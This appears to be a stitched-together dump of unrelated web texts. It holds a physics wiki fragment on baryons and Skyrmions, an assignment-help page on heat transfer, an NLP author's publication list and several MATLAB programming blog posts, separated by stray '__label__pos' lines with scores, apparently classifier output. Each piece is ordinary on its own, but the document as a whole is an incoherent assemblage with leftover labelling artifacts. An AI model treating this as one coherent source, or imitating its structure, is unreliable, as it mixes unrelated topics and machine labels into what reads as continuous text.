an instanton, nevertheless each instanton induces precisely one net baryon. (If one doesn’t want to consider a Hartle-Hawking-type Euclidean no-boundary spacetime but instead a globally hyperbolic spacetime then the conclusion still holds, just not relative to vanishing baryon number at the “south pole” of the cosmic 4-sphere, but relative to the net baryon number at any chosen spatial reference slice. ) For more on this see at baryogenesis – Exposition. Skyrmions Skyrmions realize baryons and atomic nuclei as “knotted states” (in fact as cohomotopy classes) of a meson-field. According to Ranada-Trueba 01, p. 200: Skyrme had studied with attention Kelvin’s ideas on vortex atoms. category: reference Last revised on May 20, 2021 at 10:05:51. See the history of this page for a list of all contributions to it.
__label__pos
0.793535
+ 61-7-5641-0117 Our Rating 4.9 out of 5 based on 15243 Votes assignment help submit now plagiarism checker Heat and Mass Transfer Assignment Help It deals with the engineering behind the transfer of Heat or Thermal energy. Heat transfer is achieved by the Conduction, Convection or Radiation process. This process follows different laws to transfer the heat. Heat transfer can be affected by various factors like temperature, pressures, properties of the material, the flow rate of fluid, etc. Different modes of heat transfer are discussed below: 1. Conduction: This occurs generally with the solid body. In this, the molecules transfer their energy to slower moving molecules. This type of heat transfer follows Fourier’s law of heat conduction which states that rate of heat transfer through a material is proportional to the negative gradient in the temperature and to the area perpendicular to the gradient, through which the heat flows. This gives a constant which is known as thermal conductivity. Every material has different thermal conductivity. 1. Convection: This mode of heat transfer can occur on fluid medium i.e. liquid and air medium. In this type of heat transfer bulk movement of molecules occurs that’s why this not occurs in the solid. It follows Newton’s Law of cooling which states that the rate of heat loss of a body is directly proportional to the difference in the temperatures between the body and its surroundings. This gives a constant which is known as Heat transfer coefficient. Every material has a different thermal coefficient which also changes with the rate of flow of material. 1. Radiation: This mode of heat transfer does not require any medium to travel. It is the same mode by which the heat of the sun is transferred to the earth through the vacuum space. It follows Stefan-Boltzmann Law which states that hat the total energy transfer through radiation per unit surface area is directly proportional to the fourth power of the temperature of the body. It gives the constant which is known as Stefan-Boltzmann constant which is equal to 5.670373 x 10-8 Wm-2K-4. There are various which are studied in this subject which deals with the application in real life. Some of the topics are mentioned below: • Modes of Heat transfer • Steady and transient heat Conduction • Natural and forced Convection • Design of Heat exchangers • Boiling and Condensation Heat and mass transfer are widely used in the field of Architecture to design energy efficient infrastructure, Climate engineering as our climate is strongly affected by the radiation of the sun, etc. Cooling of any space is also the best example of heat transfer which we see in our day to day life most commonly. Evaporative cooling is the commonly used method to cool any space. Subjects in Mechanical Engineering ⯈Fluid Mechanics ⯈Fluid Dynamics ⯈Heat and Mass Transfer ⯈Refrigeration And Air Conditioning ⯈Thermodynamics ⯈Manufacturing Engineering ⯈Strength of Materials ⯈Theory of Machines ⯈Thermal Engineering ⯈Components of a Force ⯈Equilibrium of Concurrent Force System ⯈Moment of a Force ⯈Friction ⯈Resultant of Concurrent Force System ⯈Simple Stresses And Strains ⯈Analysis of Strains ⯈Analysis of Stress ⯈Linear Progamming Optimization Tap to Chat Get instant assignment help Tap to Chat Get instant assignment help
__label__pos
0.951284
Seyed Mahed Mousavi 2023 pdf bib Understanding Emotion Valence is a Joint Deep Learning Task Gabriel Roccabruna | Seyed Mahed Mousavi | Giuseppe Riccardi Proceedings of the 13th Workshop on Computational Approaches to Subjectivity, Sentiment, & Social Media Analysis The valence analysis of speakers’ utterances or written posts helps to understand the activation and variations of the emotional state throughout the conversation. More recently, the concept of Emotion Carriers (EC) has been introduced to explain the emotion felt by the speaker and its manifestations. In this work, we investigate the natural inter-dependency of valence and ECs via a multi-task learning approach. We experiment with Pre-trained Language Models (PLM) for single-task, two-step, and joint settings for the valence and EC prediction tasks. We compare and evaluate the performance of generative (GPT-2) and discriminative (BERT) architectures in each setting. We observed that providing the ground truth label of one task improves the prediction performance of the models in the other task. We further observed that the discriminative model achieves the best trade-off of valence and EC prediction tasks in the joint prediction setting. As a result, we attain a single model that performs both tasks, thus, saving computation resources at training and inference times. pdf bib Response Generation in Longitudinal Dialogues: Which Knowledge Representation Helps? Seyed Mahed Mousavi | Simone Caldarella | Giuseppe Riccardi Proceedings of the 5th Workshop on NLP for Conversational AI (NLP4ConvAI 2023) Longitudinal Dialogues (LD) are the most challenging type of conversation for human-machine dialogue systems. LDs include the recollections of events, personal thoughts, and emotions specific to each individual in a sparse sequence of dialogue sessions. Dialogue systems designed for LDs should uniquely interact with the users over multiple sessions and long periods of time (e.g. weeks), and engage them in personal dialogues to elaborate on their feelings, thoughts, and real-life events. In this paper, we study the task of response generation in LDs. We evaluate whether general-purpose Pre-trained Language Models (PLM) are appropriate for this purpose. We fine-tune two PLMs, GePpeTto (GPT-2) and iT5, using a dataset of LDs. We experiment with different representations of the personal knowledge extracted from LDs for grounded response generation, including the graph representation of the mentioned events and participants. We evaluate the performance of the models via automatic metrics and the contribution of the knowledge via the Integrated Gradients technique. We categorize the natural language generation errors via human evaluations of contextualization, appropriateness and engagement of the user. pdf bib What’s New? Identifying the Unfolding of New Events in a Narrative Seyed Mahed Mousavi | Shohei Tanaka | Gabriel Roccabruna | Koichiro Yoshino | Satoshi Nakamura | Giuseppe Riccardi Proceedings of the The 5th Workshop on Narrative Understanding Narratives include a rich source of events unfolding over time and context. Automatic understanding of these events provides a summarised comprehension of the narrative for further computation (such as reasoning). In this paper, we study the Information Status (IS) of the events and propose a novel challenging task: the automatic identification of new events in a narrative. We define an event as a triplet of subject, predicate, and object. The event is categorized as new with respect to the discourse context and whether it can be inferred through commonsense reasoning. We annotated a publicly available corpus of narratives with the new events at sentence level using human annotators. We present the annotation protocol and study the quality of the annotation and the difficulty of the task. We publish the annotated dataset, annotation materials, and machine learning baseline models for the task of new event extraction for narrative understanding. 2022 pdf bib Evaluation of Response Generation Models: Shouldn’t It Be Shareable and Replicable? Seyed Mahed Mousavi | Gabriel Roccabruna | Michela Lorandi | Simone Caldarella | Giuseppe Riccardi Proceedings of the 2nd Workshop on Natural Language Generation, Evaluation, and Metrics (GEM) Human Evaluation (HE) of automatically generated responses is necessary for the advancement of human-machine dialogue research. Current automatic evaluation measures are poor surrogates, at best. There are no agreed-upon HE protocols and it is difficult to develop them. As a result, researchers either perform non-replicable, non-transparent and inconsistent procedures or, worse, limit themselves to automated metrics. We propose to standardize the human evaluation of response generation models by publicly sharing a detailed protocol. The proposal includes the task design, annotators recruitment, task execution, and annotation reporting. Such protocol and process can be used as-is, as-a-whole, in-part, or modified and extended by the research community. We validate the protocol by evaluating two conversationally fine-tuned state-of-the-art models (GPT-2 and T5) for the complex task of personalized response generation. We invite the community to use this protocol - or its future community amended versions - as a transparent, replicable, and comparable approach to HE of generated responses. pdf bib Can Emotion Carriers Explain Automatic Sentiment Prediction? A Study on Personal Narratives Seyed Mahed Mousavi | Gabriel Roccabruna | Aniruddha Tammewar | Steve Azzolin | Giuseppe Riccardi Proceedings of the 12th Workshop on Computational Approaches to Subjectivity, Sentiment & Social Media Analysis Deep Neural Networks (DNN) models have achieved acceptable performance in sentiment prediction of written text. However, the output of these machine learning (ML) models cannot be natively interpreted. In this paper, we study how the sentiment polarity predictions by DNNs can be explained and compare them to humans’ explanations. We crowdsource a corpus of Personal Narratives and ask human judges to annotate them with polarity and select the corresponding token chunks - the Emotion Carriers (EC) - that convey narrators’ emotions in the text. The interpretations of ML neural models are carried out through Integrated Gradients method and we compare them with human annotators’ interpretations. The results of our comparative analysis indicate that while the ML model mostly focuses on the explicit appearance of emotions-laden words (e.g. happy, frustrated), the human annotator predominantly focuses the attention on the manifestation of emotions through ECs that denote events, persons, and objects which activate narrator’s emotional state. 2021 pdf bib Would you like to tell me more? Generating a corpus of psychotherapy dialogues Seyed Mahed Mousavi | Alessandra Cervone | Morena Danieli | Giuseppe Riccardi Proceedings of the Second Workshop on Natural Language Processing for Medical Conversations The acquisition of a dialogue corpus is a key step in the process of training a dialogue model. In this context, corpora acquisitions have been designed either for open-domain information retrieval or slot-filling (e.g. restaurant booking) tasks. However, there has been scarce research in the problem of collecting personal conversations with users over a long period of time. In this paper we focus on the types of dialogues that are required for mental health applications. One of these types is the follow-up dialogue that a psychotherapist would initiate in reviewing the progress of a Cognitive Behavioral Therapy (CBT) intervention. The elicitation of the dialogues is achieved through textual stimuli presented to dialogue writers. We propose an automatic algorithm that generates textual stimuli from personal narratives collected during psychotherapy interventions. The automatically generated stimuli are presented as a seed to dialogue writers following principled guidelines. We analyze the linguistic quality of the collected corpus and compare the performances of psychotherapists and non-expert dialogue writers. Moreover, we report the human evaluation of a corpus-based response-selection model.
__label__pos
0.954632
MATLAB Techniques: variadic (variable input and output) arguments I’ve seen a lot of ugly implementations from people trying to deal with variable number of input and output arguments. The most horrendous one I’ve seen so far came from MIT’s Physionet’s WFDB MATLAB Toolbox. Here’s a snippet showing how wfdbdesc.m handles variable input and output arguments: function varargout=wfdbdesc(varargin) % [siginfo,Fs,sigClass]=wfdbdesc(recordName) ... %Set default pararamter values inputs={'recordName'}; outputs={'siginfo','Fs','sigClass'}; for n=1:nargin if(~isempty(varargin{n})) eval([inputs{n} '=varargin{n};']) end end ... if(nargout>2) %Get signal class sigClass=getSignalClass(siginfo,config); end for n=1:nargout eval(['varargout{n}=' outputs{n} ';']) end   The code itself reeks a very ‘smart’ beginner who didn’t RTFM. The code is so smart (shows some serious thoughts): • Knows to use nargout to control varargout to avoid the side effects when no output is requested • [Cargo cult practice]: (unnecessarily) track your variable names • [Cargo cult practice]: using varargin so it can be symmetric to varargout (also handled similarly). varargout might have a benefit mentioned above, but there is absolutely no benefit to use varargin over direct variable names when you are not forwarding or use inputParser(). • [Cargo cult practice]: tries to be efficient to skip processing empty inputs. Judicially non-symmetric this time (not done to output variables)! but yet so dumb (hell of unwise, absolutely no good reason for almost every ‘thoughtful’ act put in) at the same time. Definitely MIT: Make it Tough! This code pattern is so wrong in many levels: • Unnecessarily obscuring the names by using varargin/varargout • Managing a list of variable names manually. • Loop through each item of varargin and varargout cells unnecessarily • Use eval() just to do simple cell assignments! Makes me cringe! Actually, eval() is not even needed to achieve all the remaining evils above. Could have used S_in = cell2struct(varargin) and varargout=struct2cell(S_out) instead if one really wants to control the list of variable names manually! The hurtful sins above came from not knowing a few common cell packing/unpacking idioms when dealing with varargin and varargout, which are cells by definition. Here are the few common use cases: 1. Passing variable arguments to another function (called perfect forwarding in C++): remember C{:} unpacks to comma separated lists! function caller(varargin) callee(varargin{:}); 2. Limiting the number of outputs to what is actually requested: remember [C{:}] on left hand side (assignment) means the outputs are distributed as components of C that would have been unpacked as comma separated lists, i.e. [C{:}] = f(); means [C{1}, C{2}, C{3}, ...] = f(); function varargout = f() // This will output no arguments when not requested, // avoiding echoing in command prompt when the call is not terminated by a semicolon [varargout{1:nargout}] = eig(rand(3)); 3. You can directly modify varargin and varargout by cells without de-referencing them with braces! function varargout = f(varargin) // This one is effectively deal() varargout = varargin(1:nargout); end function varargout = f(C) // This one unpacks each cell's content to each output arguments varargout = C(1:nargout); end One good example combining all of the above is to achieve the no-output argument example in #2 yet neatly return the variables in the workspace directly by name. function [a, b] = f() // Original way to code: will return a = 4 when "f()" is called without a semicolon a = 4; b = 2; end function varargout = f() // New way: will not return anything even when "f()" is called without a semicolon a = 4; b = 2; varargout = manage_return_arguments(nargout, a, b); end function C = manage_return_arguments(nargs, varargin) C = varargin(1:nargs); end I could have skipped nargs in manage_return_arguments() and use evalin(), but this will make the code nastily non-transparent. As a bonus, nargs can be fed with min(nargout, 3) instead of nargout for extra flexibility. With the technique above, wfdbdesc.m can be simply rewritten as: function varargout = wfdbdesc(recordName) % varargout: siginfo, Fs, sigClass ... varargout = manage_return_arguments(nargout, siginfo, Fs, sigClass); Unless you are forwarding variable arguments (with technique#1 mentioned above), input arguments can be (and should be) named explicitly. Using varargin would not help you avoid padding the unused input arguments anyway, so there is absolutely no good reason to manage input variables with a flexible list. MATLAB already knows to skip unused arguments at the end as long as the code doesn’t need it. Use exist('someVariable', 'var') instead.     445 total views, 1 views today MATLAB Practices: Code and variable transparency. eval() is one letter away from evil() Transparency means that all references to variables must be visible in the text of the code The general wisdom about eval() is: do not use it! At least not until you are really out of reasonable options after consulting more than 3 experts on the newsgroups, forums and [email protected] (if your SMS is current)! Abusing eval() turns it into evil()! The elves running inside MATLAB needs to be able to track your variables to reason through your code because: • it helps your code run much faster (eval() cannot be pre-compiled) • able to use parallel computing toolbox (it has to know absolutely for sure about any shared writes) • mlint can warn you about potentially pitfalls through code smell. • it keeps you sane while debugging! This is called ‘transparency’: MATLAB has to see what you are doing every step of the way. According to MATLAB’s parallel computing toolbox’s documentation, Transparency means that all reference to variables must be visible in the text of the code which I used as a subtitle of this post. The 3 major built-in functions that breaks transparency are: 1. eval(), evalc(): arbitrary code execution resulting in read and write access to its caller workspace. 2. assignin(): it poofs variables in its caller’s workspace! 3. evalin(): it breaks open the stack and read the variables in its caller’s workspace! They should have been replaced by skillful use of dynamic field names, advanced uses of left assignment techniques, and freely passing variables as input arguments (remember MATLAB uses copy-on-write: nothing is copied if you just read it).   There are other frequently used native MATLAB functions (under certain usages) that breaks transparency: 1. load(): poof variables from the file to the workspace. The best practice is to load the file as a struct, like S=load('file.mat'); , which is fully transparent. Organizing variables into structs actually reduces mental clutter (namespace pollution)! 2. save(), who(), whos(): basically anything that takes variable names as input and act on the requested variable violates transparency because it’s has the effect of evalin(). I guess the save() function chose to use variable names instead of the actual variables as input because copy-on-write wasn’t available in early days of MATLAB. A example workaround would be: function save_transparent(filename, varargin) VN = arrayfun(@inputname, (2:nargin)', 'UniformOutput', false); if( any( cellfun(@isempty, VN) ) ) error('All variables to save must be named. Cannot be temporaries'); end S = cell2struct(varargin(:), VN, 1); save(filename, '-struct', 'S'); end function save_struct_transparent(filename, S) save(filename, '-struct', 'S'); end The good practices to avoid non-transparent load/save also reduces namespace pollution. For example, inputname() peeks into the caller to see what the variable names are, which should not be used lightly. The example above is one of the few uses that I consider justified. I’ve seen novice abusing inputname() because they were not comfortable with cells and structs yet, making it a total mindfuck to reason through. 523 total views, 2 views today Switch between 32-bit and 64-bit user written software like CVX CVX is a very convenient convex optimization package that allows the user to specify the optimization objective and constraints directly instead of manually manipulating them (by various transformations) into forms that are accepted by commonly available software like quadprog(). What I want to show today is not CVX, but a technique to handle the many different versions of the same program targeted at each system architecture (32/64-bit, Windows/Mac/Linux). Here’s a snapshot of what’s available with cvx: OS 32/64 mexext Download links Linux 32-bit mexglx cvx-glx.zip 64-bit mexa64 cvx-a64.zip Mac 32-bit mexmaci cvx-maci.zip 64-bit mexmaci64 cvx-maci64.zip Windows 32-bit mexw32 cvx-w32.zip 64-bit mexw64 cvx-w64.zip You can download all packages for different architectures, but make a folder for each of them by their mexext() name. For example, 32-bit Windows’ implementation can go under /mexw32/cvx. Then you can programmatically initialize the right package for say, your startup.m file: run( fullfile(yourLibrary, mexext(), 'cvx', 'cvx_startup.m') ); I intentionally put the /[mexext()] above /cvx, not the other way round because if you have many different software packages and want to include them in the path, you can do it in one shot without filtering for the platform names: addpath( genpath( fullfile(yourLibrary, mexext()) ) ); You can consider using computer(‘arch’) in place of mexext(), but the names are different and you have to name your folders accordingly. For CVX, it happens to go by mexext(), so I naturally used mexext() instead. 435 total views, no views today MATLAB Gotchas: Do NOT use getlevels(), getlabels() or categories() for categorical/nominal/ordinal objects Use unique(), unique(cellstr()) instead I suspect TMW (The MathWorks, maker of MATLAB) hasn’t really thought about dead levels when a categorical object (I mean nominal() and ordinal() as well since they are wrapper child class of categorical()) has elements removed so that some levels doesn’t map to any elements anymore. For performance reasons, it makes sense to keep the dead levels in because the user can repetitively add and remove the same last level by deleting and adding the same element, causing unnecessary work each time. Naturally, there’s a getlevels()/getlabels()/categories() method in nominal(),ordinal()/categorical() class so you know what raw levels are available. Turns out it’s a horrible idea to expose the raw levels when dead levels are allowed! Unless you are dealing with the internals of categorical objects, there’s very little reason why one would care or want to know about the dead levels (it’s just a cache for performance). It’s the active levels that are currently mapped to some elements that matters when user make such queries, which is handled correctly by unique(). If there are no dead levels, getlevels() is equivalent to unique(), while categorical() and getlabels() are equivalent to unique(cellstr()), but I’m very likely to run into dead levels because I delete rows of data when I filter by certain criterion. My first take on it would be to hide getlevels()/getlabels()/categories() from users. But over the years, I’ve grown from a conservative software point of view to accepting more liberal approach, especially after exposure to functional programming ideas. That means I’d rather have a way to know what’s going on inside (keep those functions there), but I’d like to be warned that it’s an evil feature that shouldn’t be used lightly. Yes, I’m dissing the use of getlevels()/getlabels()/categories() like the infamous eval(). Once in a long while, it might be a legitimate neat approach. But for 99% of the time, it’s a strictly worse solution that causes a lot of damages. It’s way more unlikely that getlevels()/getlabels()/categories() will yield what you really mean with dead levels than multiple inheritance in C++ being the right approach on the first try. If I use unique() all the time, why would I even bother to talk about getlevels()/getlabels()/categories() since I never used them? It’s because TMW didn’t warn users about the dangers in their documentation. These methods looks legit and innocent, but it’s a usage trap like returning stack pointers in C/C++ (you can technically do it, but with almost 100% certainty, you are telling the computer to do something you don’t mean to, in short: wrong). I have two encounters that other people using the raw categorical levels that harmed me: 1. One of my coworkers spoke against upgrading our MATLAB licenses (later withdrew his opposition) because the new versions breaks his old code involving nominal()/ordinal() objects.I was perplexed because it didn’t break any of my code despite I used more nominal() and ordinal() objects than anybody in my vicinity. On close inspection, he was using getlevels() and getlabels() all over the place instead of unique(), which works seamlessly in the new MATLAB. Remember I mentioned that the internal design/implementation details of nominal()/ordinal() changed in MATLAB R2013a? The internal treatment of dead levels has changed. The change was supposed to be irrelevant to end-users by design if getlevels()/getlabels() had not expose dead levels to end-users. Because of the oversight, users have written code that depends on how dead levels are internally handled! 2. The default factory-shipped grpstats() is still ‘broken’ as of R2015b! If you feed grpstats() with a nominal grouping variable, it will give you lines of NaN because it was programmed to spit out one row for each level (dead or alive) in the grouping variable. Since the dead levels has nothing to group by the reduction function (@mean if not specified), it spits out multiple NaNs as by definition NaN do not equal to anything else, including NaN itself. This is traced to how grp2idx() is used internally: If the grouping variable is a cellstr() or double(), the groups are generated by using unique(), so there are no dead levels whatsoever. But if the grouping variable is a categorical, the developers thought their job is done already and just took it directly from the categorical object’s properties by calling getlabels() and getlevels(): gidx = double(s); ... gnames = getlabels(s)'; glevels = getlevels(s)'; Apparently the author of the factory-shipped code forgot that there’s a reason why the categorical/unique() has the same function name as double/unique() and cellstr/unique(): the point of overloading is to have the same function name for the same intention! The intention of unique() should be uniformly applied across all the data types applicable. Think twice before relying on language support for type info (like type traits in C++) to switch code when you can use overloading(MATLAB)/polymorphism(C++). A good architecture should lead you to the correct code logic without the need of overriding good practices. Rants aside, grpstats() will work as intended if those lines in grp2idx() are changed to: gidx = double(s); ... glevels = unique(s(:)); gnames = cellstr(glevels); A higher level fix would be applying grp2idx() to the grouping variable before it was fed into grpstats(): grpstats(X, grp2idx(g), ...) The rationale is that the underlying contents doesn’t matter for grouping variables as long as each of them uniquely stand for the group they represent! In other words, categorical() objects are seen as nothing but a bunch of integers, which can be obtained by casting it to double(): gidx = double(s); grpstats(X, gidx, ...) This is what grp2idx() calls under the hood anyway when it sees a categorical. The grp2idx() called from grpstats() will see a bunch of integers, which will correctly apply unique() to them, thus removing all dead levels. Of course, use grp2idx() instead of double() because it works across all data types that applies. Why future-constrain yourself when a more generic implementation is already available? The sin committed by grpstats() over nominal() is that the variables in glevels and gnames shouldn’t get involved in the first place because they don’t matter and shouldn’t even show up in the outputs. This is what’s fundamentally wrong about it: [group,...,ngroups] = mgrp2idx(group,rows); ... // This code assumes there are no gaps in group levels (gnum), which is not always true. for gnum = 1:ngroups groups{gnum} = find(group==gnum); end We can either blame the for-loop for not skipping dead levels, or blame mgrp2idx (a wrapper of grp2idx) for spitting out the dead levels. It doesn’t really matter which way it is. The most important thing is that dead levels were let loose, and nobody in the developer-user chain understand the implications enough to stop the problem from propagating to the final output. To summarize, the raw levels in categorical objects is a dirty cache including junk you do not want 99.99% of the time. Use unique() to get the meaningful unique levels instead. 521 total views, no views today MATLAB Compatibility: nominal() and ordinal() objects since R2013a are not compatible with R2012b and before In the old days (before R2013a), nominal() and ordinal() were separate parallel classes with astoundingly similar structures. That means there’s a lot of copy-paste-mod going on. TMW improved on it by consolidating the ideas into a new categorical() class, which nominal() and ordinal() derives from it. The documentation mentioned that nominal() and ordinal() might be deprecated in the future, but I contacted their support urging them not to. It’s not for compatibility reasons: nominal() and ordinal() captures the common use cases that these two ideas do not need to be unified, and the names themselves clearly encodes the intention. If the user want to exploit the commonalities between the two, either it’s already taken care of by the parent’s public methods, or the object can be sliced to make it happen. I looked into the source code for nominal() and ordinal(): it’s pretty much a wrapper over categorical’s methods yet the interface (input arguments) are much simpler and intuitive because we don’t have to consider all the more general cases. Back to the titled topic. Because categorical()’s properties (members) are different from pre R2013a’s nominal() and ordinal() objects, the objects created in R2012b or before cannot be loaded correctly in newer versions. That means the backward compatibility is completely broken for nominal()/ordinal() as far as saved objects are concerned. There’s no good incentive to solve this problem on the TMWs side because the old nominal()/ordinal() is short-lived and they always want everybody to upgrade. Since I use nominal() most of the time and the ones that really need to be saved are all nominal(), I recommend the converting (‘casting’) them to cellstr by >> A = nominal({'a','a','b','c'}); >> A = cellstr(A) A = 'a' 'a' 'b' 'c' Remember, nominal() is pretty much compressing a ton of cellstr into a few unique items and mapping the indices. No information is lost going back and forth between cellstr() and nominal(). It’s just a little extra computations for the conversion. As for ordinal(), I rarely need to save it because order/level assignment is almost the very last thing in the processing chain because it changes so frequently (e.g. how would you draw the lines for six levels of fatness?), I might as well just not save it and reprocess the last step (where the code with ordinal() sits) when I need it. Nonetheless, if you still want to save ordinals() instead of re-crunching it, this time you’ll want to save it as numerical levels by casting the ordinal() into double(): >> A = ordinal([1 2 3; 3 2 1; 2 1 3],{'low' 'medium' 'high'}, [3 1 2]) A = medium high low low high medium high medium low >> D = double(A) D = 2 3 1 1 3 2 3 2 1 >> U = unique(A) U = low medium high >> L = cellstr(U) L = 'low' 'medium' 'high' >> I = double(U) I = 1 2 3 >> A_reconstructed = ordinal(D, L, I) A_reconstructed = medium high low low high medium high medium low You’ll save (D, L, I) from old MATLAB and load it and reconstruct it with the triplets from the new MATLAB (I’d suggest using structs to keep track of the triplets). I know it’s a hairy mess!   498 total views, no views today MATLAB Gotchas: Adding whitespace in strcat() strcat() is a very handy function in MATLAB that allows you to combine strings using a mixture of cellstr() and char strings and it will auto-expand the char strings to match the cellstr() if necessary. However, by design intention, strcat() removes trailing white spaces by internally applying deblank() to all char string inputs. It does NOT deblank cellstr() inputs. So if you want to combine date and time with a space, you have to use {‘ ‘} instead of ‘ ‘: date = '2000-01-01'; time = '00:00:01'; >> strcat(date, ' ', time) % The ' ' is ignored ans = 2000-01-0100:00:01 >> strcat(date, {' '}, time) % The ' ' is ignored ans = '2000-01-01 00:00:01' >> I find this more confusing than helpful. Including myself and other users, we naturally resort to processing line by line using cellfun() or other tricks just to get around the deblank() problem without taking a second look at the documentation because • rolling our own implementation is marginally as annoying as the deblank() • we expect cellstr() to match the dimensions without auto-expanding. I naturally thought it would expand only if it’s a char string. Well, somebody asked this question on the newsgroup before, so obviously it’s not an intuitive design. It make sense to do it the way MATLAB designed strcat() because we need some way to tell MATLAB whether I want my inputs deblanked or not. I think it’s more intuitive to have MATLAB’s default strcat() not to deblank() char strings at all and have a strcat_deblanked() that deblanks the inputs before feeding into strcat(). Unfortunately this behavior is there for a long time, so it’s too late to change it without affecting compatibility. Might as well live with it, but this is one of the very few unnatural (or slightly illogical design choice) of MATLAB to keep in mind. 1,255 total views, 2 views today MATLAB Features: Persistent Excel ActiveX (DCOM) for xlsread() and xlswrite() R2015b xlsread() and everything that calls it, such as readtable(), is terribly slow, especially when you have a boatload of Excel files to process. The reason behind it is that xlsread() closes that DCOM handle (which closes the Excel COM session) after it finishes, and restart Excel (DCOM) again when you call xlsread() again to load another spreadsheet file. That means there’s a lot of opening and closing of the Excel application if you process multiple spreadsheets. The better strategy, which is covered extensively in MATLAB’s File Exchange (FEX), is to have your program open one Excel handle, and process all the spreadsheets within the same DCOM handle before closing it. This strategy is quite overwhelming for a beginner, and even if you use FEX entries, you still cannot get around the fact that you have to know there’s a handle that manages the Excel session and remember to close it after you are done with it. Nothing beats having xlsread() do it automatically for you. Starting with R2015b, the Excel DCOM handle called by xlsread() is now persistent: that after you make the first call to xlsread(), Excel.exe will stay in the memory unless you explicitly clear persistent variables or exit MATLAB, so you can reuse them every time xlsread() or xlswrite() is called. Finally! The code itself is pretty slick. You can find it in ‘matlab.io.internal.getExcelInstance()’. Well, I guess it’s not hard to come up with it, but I guess in TMW, they must have a heated debate about whether it’s a good idea to keep Excel around (taking up resources) when you are done with it. With the computation power required to run R2015b, an extra Excel.exe lying around should be insignificant. Good call!   1,364 total views, no views today MATLAB Techniques: Who’s your daddy? Ask dbstack(). Unusual uses of dbstack() Normally having your function know about its caller (other than through the arguments we pass onto the stack) is usually a very bad idea in program organization, because it introduces unnecessary coupling and hinders visibility. Nonetheless, debugger is a built-in feature of MATLAB and it provides dbstack() so you have access to your call stack as part of your program. Normally, I couldn’t come up with legitimate uses of it outside debugging. One day, I was trying to write a wrapper function that does the idiom (mentioned in my earlier blog post) fileparts( mfilename('fullpath') ); because I want the code to be self-documenting. Let’s call the function mfilepath(). Turns out it’s a difficult problem because mfilename(‘fullpath’) reports the path of the current function executing it. In the case of a wrapper, it’s the path of the wrapper function, not its caller that you are hoping to extract its path from. In other words, if you write a wrapper function, it’s the second layer of the stack that you are interested in. So it can be done with dbstack(): function p = mfullpath() ST = dbstack('completenames'); try p = ST(2).file; catch p = ''; end Since exception handling is tightly knit into MATLAB (unlike C++, which you pay for the extra overhead), there aren’t much performance penalty to use a try…catch() block than if I checked if ST actually have a second layer (i.e. has a non-base caller). I can confidently do that because there is only one way for this ST(2).file access operation to fail: mfullpath() is called from the base workspace. Speaking of catchy titles, I wonder why Loren Shure, a self-proclaimed lover of puns and the blogger of the Art of MATLAB, haven’t exploited the built-in functions ‘who’ and ‘whos’ in her April Fools jokes like whos your daddy who let the dogs out Note that these are legitimate MATLAB syntax that won’t throw you an exception. Unless you have ‘your’, ‘daddy’, ‘let’, ‘the’, ‘dogs’, ‘out’ as variable names, the above will quietly show nothing. It’d be hilarious if they pass that as an easter egg in the official MATLAB. They already have ‘why’, why not Error using rng (line 125) First input must be a nonnegative integer seed less than 2^32, 'shuffle', 'default', or generator settings captured previously using S = RNG. Error in why (line 10) dflt = rng(n,'v5uniform');       606 total views, no views today MATLAB Quirks: struct with no fields are not empty As far as struct() is concerned, I’m more inclined to using Struct of Array (SoA) over Array of Structs (AoS), unless all the use cases screams for SoA. Performance and memory overhead are the obvious reasons, but the true motivation for me to use SoA is that I’m thinking in terms of table-oriented programming (which I’ll discuss in later posts. See table() objects.): each field of a struct is a column in a table (heterogeneous array). Since a table() is considered empty (by isempty()) if it has EITHER 0 rows INCLUSIVE OR 0 columns (no fields) and the default constructor creates a 0 \times 0 table, I thought struct() would do the same. NOT TRUE! First of all, the default constructor of struct() gives ONE struct with NO FIELDS (so it’s supposed to correspond to a 1 \times 0 table). What’s even harder to remember is that struct2table(struct()) gives a 0 \times 0 table. The second thing I missed is that a struct() with NO fields is NOT empty. You can have 3 structs with NO fields! So isempty(struct()) is always false! I usually run into this problem when I want to seed the execution with an empty struct() and have the loop expand the fields if the file has contents in it, and I’ll check if the seeded struct was untouched to see if I can read data from the file. Next time I will remember to call struct([]) instead of struct(). What a trap! At the end of the day, while struct is powerful, but I rarely find AoS necessary to do what I wanted once table() is out. AoS has pretty much the same restrictions as in table() that you cannot put different types in the same field across the AoS, but table allows you to index with variables (struct’s field) or rows (struct array index) without changing the data structure (AoS <-> SoA). So unless it’s a performance critical piece of the code, I’ll stick with tables() for most of my struct() needs.   2,358 total views, 4 views today MATLAB Techniques: onCleanup() ‘destructor’ If your program opens a file, creates a timer(), or whatever resources that needs to be closed when they are no longer needed, before R2008a, you have to put your close resource calls at two places: one at the end of successful execution, the other at the exception handling in try…catch block: FID = fopen('a.txt') try // ... do something here fclose(FID); catch fclose(FID); end Not only it’s messy that you have to duplicate your code, it’s also error prone when you add code in between. If your true intention is to close the resource whenever you exit the current program scope, there’s a better way for you: onCleanup() object. The code above can be simplified as: FID = fopen('a.txt') obj = onCleanup(@() fclose(FID)); // ... do something with FID here The way onCleanup() works is that it creates an object which you define what its destructor (delete()) does on creation (by the constructor of course) by specifying a function handle. This way when ‘obj’ is cleared (either as it goes out of scope or your explicitly cleared it with ‘clear’), the destructor in ‘obj’ will be activated and do the cleanup actions you specified. Due to copyright reasons, I won’t copy the simple code here. Just open onCleanup.m in MATLAB editor and you’ll see it that the code (excluding comments) has less words than the description above. Pretty neat! Normally we use onCleanup() inside a function. The best place to put is is right after you opened a resource because anything in between can go wrong (i.e. might throw exceptions): you want ‘obj’ to be swept (i.e. its destructors called) when that happens. Technically, you can make an onCleanup() object in the base (root) workspace (aka command window). The destructor will be triggered either when you clear the ‘obj’ explicitly using ‘clear’ or when you exit MATLAB. You can see for yourself with this: obj = onCleanup(@() pause); It kind of let you do a one-off cleanup on exit instead of a recurring cleanup in finish.m. So the next time you open a resource that needs to be closed whether the program exits unexpectedly or not, use onCleanup()! It’s one of the elegant, smart uses of OOP.   875 total views, 2 views today
__label__pos
0.510153
